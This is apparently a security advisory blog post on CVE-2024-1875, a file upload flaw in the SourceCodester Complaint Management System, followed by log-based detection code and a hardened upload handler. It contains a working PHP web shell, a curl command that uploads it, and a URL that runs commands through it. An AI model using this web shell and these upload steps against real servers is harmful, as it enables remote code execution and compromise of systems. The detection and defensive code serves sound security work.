In early 2024, a critical security vulnerability (CVE-2024-1875) was disclosed for the SourceCodester Complaint Management System 1. The vulnerability allows remote attackers to upload arbitrary files, malicious ones included, through the application's "Lodge Complaint" feature, giving them a straightforward way to compromise the system.

This post gives you an exclusive, easy-to-understand overview, including proof-of-concept snippets, how the attack works, links to original sources, and how to protect your system.

- Product: SourceCodester Complaint Management System 1.
- Component: Lodge Complaint Section (users/register-complaint.php)
- Access Vector: Remote
- Exploit Disclosure: Vulnerability Database Entry (VDB-254723)

How Does the Vulnerability Work?

The users/register-complaint.php endpoint accepts file uploads (like attachments related to new complaints). However, there's no proper check on the file type, content, or extension. This means attackers can upload anything: PHP web shells, malware, or even reverse shell scripts.

Uploaded files are saved in a web-accessible directory.

The risk: Once a malicious PHP script is uploaded, attackers can browse to it and execute any commands under the web server's privileges.

Step 1: Save the following PHP code as shell.php

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

Step 2: Upload the Shell

Open the "Lodge Complaint" form on the vulnerable application (usually at /users/register-complaint.php). In the file attachment field, select shell.php and submit the complaint.

Alternatively, the process can be automated using curl:

curl -F "complaint_title=Test" \
     -F "complaint_desc=File upload test" \
     -F "file=@shell.php" \
     http://TARGET_HOST/users/register-complaint.php

Step 3: Access the Shell

After uploading, find the location where files are stored (this usually takes observation of the application or guessing). For example:

http://TARGET_HOST/user_docs/shell.php?cmd=whoami

This executes the whoami command on the server, proving code execution.
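From the defender's side, the two requests in the steps above (a POST to the upload endpoint, then a GET for a .php file under the attachment directory carrying a cmd parameter) are the signal to hunt for in web-server access logs. The script below is an added example, not code from the original post or from the project: it parses combined-format access-log lines and flags that pattern. The /users/register-complaint.php and /user_docs/ paths come from the post; the log lines are constructed samples and the list of script extensions is an assumption.

```php
<?php
// Added example (not from the original post): flag web-shell activity that
// follows an unrestricted upload. Paths come from the post; the extension list
// and the sample log lines below are constructed for illustration.
declare(strict_types=1);

const UPLOAD_ENDPOINT    = '/users/register-complaint.php';
const UPLOAD_PATH_PREFIX = '/user_docs/';                 // where attachments land
const SCRIPT_EXTENSIONS  = ['php', 'php3', 'php5', 'phtml', 'phar']; // assumed list

/**
 * Parse one combined/common-format log line into its request fields.
 * Returns null for lines that do not match the format.
 */
function parse_line(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    $parts = explode('?', $m[3], 2);
    return [
        'ip'     => $m[1],
        'method' => $m[2],
        'path'   => $parts[0],
        'query'  => $parts[1] ?? '',
        'status' => (int) $m[4],
    ];
}

/**
 * Return one finding per suspicious request. A request is flagged when it
 * fetches a script-like file from the attachment directory or passes a "cmd"
 * parameter to anything there; the finding also notes whether the same client
 * previously POSTed to the upload endpoint (the upload-then-execute sequence).
 */
function find_webshell_activity(array $lines): array
{
    $uploaders = [];   // ip => true once the client has POSTed to the upload form
    $findings  = [];
    foreach ($lines as $n => $line) {
        $r = parse_line($line);
        if ($r === null) {
            continue;
        }
        if ($r['method'] === 'POST' && $r['path'] === UPLOAD_ENDPOINT) {
            $uploaders[$r['ip']] = true;
            continue;
        }
        if (strncmp($r['path'], UPLOAD_PATH_PREFIX, strlen(UPLOAD_PATH_PREFIX)) !== 0) {
            continue;   // not under the attachment directory
        }
        $ext = strtolower(pathinfo($r['path'], PATHINFO_EXTENSION));
        parse_str($r['query'], $params);
        $reasons = [];
        if (in_array($ext, SCRIPT_EXTENSIONS, true)) {
            $reasons[] = 'script file requested from attachment directory';
        }
        if (isset($params['cmd'])) {
            $reasons[] = 'cmd parameter on attachment request';
        }
        if ($reasons !== [] && isset($uploaders[$r['ip']])) {
            $reasons[] = 'client previously POSTed to ' . UPLOAD_ENDPOINT;
        }
        if ($reasons !== []) {
            $findings[] = ['line' => $n + 1, 'ip' => $r['ip'], 'path' => $r['path'], 'reasons' => $reasons];
        }
    }
    return $findings;
}

// Constructed sample log lines (not real traffic).
$sample = [
    '203.0.113.7 - - [26/Feb/2024:10:00:01 +0000] "GET /users/register-complaint.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [26/Feb/2024:10:00:09 +0000] "POST /users/register-complaint.php HTTP/1.1" 302 0',
    '198.51.100.4 - - [26/Feb/2024:10:00:20 +0000] "GET /user_docs/invoice.pdf HTTP/1.1" 200 88321',
    '203.0.113.7 - - [26/Feb/2024:10:00:31 +0000] "GET /user_docs/shell.php?cmd=whoami HTTP/1.1" 200 24',
];
foreach (find_webshell_activity($sample) as $f) {
    printf("line %d: %s %s -> %s\n", $f['line'], $f['ip'], $f['path'], implode('; ', $f['reasons']));
}
```

Only the fourth sample line is reported: the legitimate PDF download under /user_docs/ passes, while the .php request with a cmd parameter from a client that had just POSTed to the upload form is flagged with all three reasons. In production the same logic belongs in the SIEM or log pipeline, and a 200 status on such a request means the shell executed and the host should be treated as compromised.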

References & Further Reading

- VulDB – CVE-2024-1875 Detail
- SourceCodester Complaint Management System 1.
- Unrestricted File Upload explained

How to Protect Your System

1. Block all uploads: Disable the feature until a patch is available.
2. Check all upload code: Ensure only specific file types (images, PDFs, etc.) are allowed. Use strict checks on file extension and MIME type.
3. Never store uploaded files in web-accessible directories.
4. Remove PHP execution permission from upload directories (see server docs for htaccess, permissions).

Example fix for PHP upload code (basic)

// Determine the MIME type from the file's contents. Do NOT use
// $_FILES['file']['type']: that value is a header set by the client, so an
// attacker can label shell.php as image/png and pass the check.
$allowed_types = ['image/jpeg', 'image/png', 'application/pdf'];
$finfo = new finfo(FILEINFO_MIME_TYPE);
$detected_type = $finfo->file($_FILES['file']['tmp_name']);
if (in_array($detected_type, $allowed_types, true)) {
    // Proceed with the upload: also check the extension, rename the file,
    // and store it outside the document root (see the steps above).
} else {
    die('Invalid file type.');
}
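The basic check above only covers the content type. The handler below is an added example that covers all four protection steps together; it is not the project's code and was not part of the original post. It assumes a storage directory outside the document root (private_uploads), a 5 MiB size limit and an upload field named file; the endpoint name is the one from the post. The file's real content type is checked with finfo, the file is stored under a server-generated name, and a separate download function hands files out, so nothing under the upload directory is ever executed or served directly by the web server.

```php
<?php
// Added example, not the project's code: a hardened attachment handler for the
// complaint form. UPLOAD_DIR, MAX_BYTES and the field name are assumptions.
declare(strict_types=1);

// Storage OUTSIDE the document root, so the web server never executes or
// serves anything here directly; files are handed out by serve_attachment().
const UPLOAD_DIR = __DIR__ . '/../private_uploads';   // assumed location
const MAX_BYTES  = 5 * 1024 * 1024;                    // assumed 5 MiB limit

// Allowlist: permitted extension => MIME type the file CONTENT must have.
const ALLOWED = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'pdf'  => 'application/pdf',
];

/**
 * Validate one entry of $_FILES and store it under a random name.
 * Returns the stored file name; throws RuntimeException on rejection.
 */
function store_attachment(array $file): string
{
    // 1. PHP's own upload status must be OK and the temp file must really
    //    come from this request (guards against forged $_FILES entries).
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed.');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large.');
    }
    // 2. Extension allowlist on the LAST extension only, lower-cased, so that
    //    "shell.php.jpg" is judged by "jpg" and "shell.PHP" is not missed.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('File type not permitted.');
    }
    // 3. MIME type from the file CONTENT via finfo, never from $file['type'],
    //    which is a client-supplied header an attacker can set freely.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED[$ext]) {
        throw new RuntimeException('File content does not match its extension.');
    }
    // 4. Never reuse the client's name: random name, single verified extension.
    //    This also removes the "guess the path" step an attacker relies on.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0750, true)) {
        throw new RuntimeException('Storage unavailable.');
    }
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file.');
    }
    chmod($dest, 0640);   // readable by the app, never executable
    return $name;
}

/**
 * Stream a stored attachment to an authorised user. Only names of the exact
 * shape produced by store_attachment() are accepted, so "../" or arbitrary
 * file names cannot reach the filesystem.
 */
function serve_attachment(string $name): void
{
    $pattern = '/\A[0-9a-f]{32}\.(' . implode('|', array_keys(ALLOWED)) . ')\z/';
    if (!preg_match($pattern, $name, $m) || !is_file(UPLOAD_DIR . '/' . $name)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: ' . ALLOWED[$m[1]]);
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header('X-Content-Type-Options: nosniff');   // browsers must not re-sniff as HTML/script
    readfile(UPLOAD_DIR . '/' . $name);
}

// Usage in the complaint handler (authorisation checks omitted):
// try {
//     $stored = store_attachment($_FILES['file']);   // save $stored with the complaint
// } catch (RuntimeException $e) {
//     http_response_code(400);
//     echo htmlspecialchars($e->getMessage());
// }
```

Because the stored name has exactly one extension and lives outside the document root, the web server's handler mapping never sees a .php file in a served path, which is what step 4 above is guarding against; keeping the htaccess or permission change in place as well costs nothing and protects against a future misconfiguration that moves the directory back under the web root.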

Conclusion

CVE-2024-1875 is a highly critical bug in a widely used open-source Complaint Management System. If you're using this system, act immediately. The vulnerability is easy to exploit, the code doesn't restrict what files are accepted, and real-world attacks are likely.

Always validate file uploads and keep your software up to date!

Have questions or need help? Drop them in the comments or contact your security team.

Stay updated and secure!

*(This article is exclusive content. Please link back if you reference any part of it.)*

Timeline

Published on: 02/26/2024 16:27:53 UTC
Last modified on: 02/29/2024 01:43:56 UTC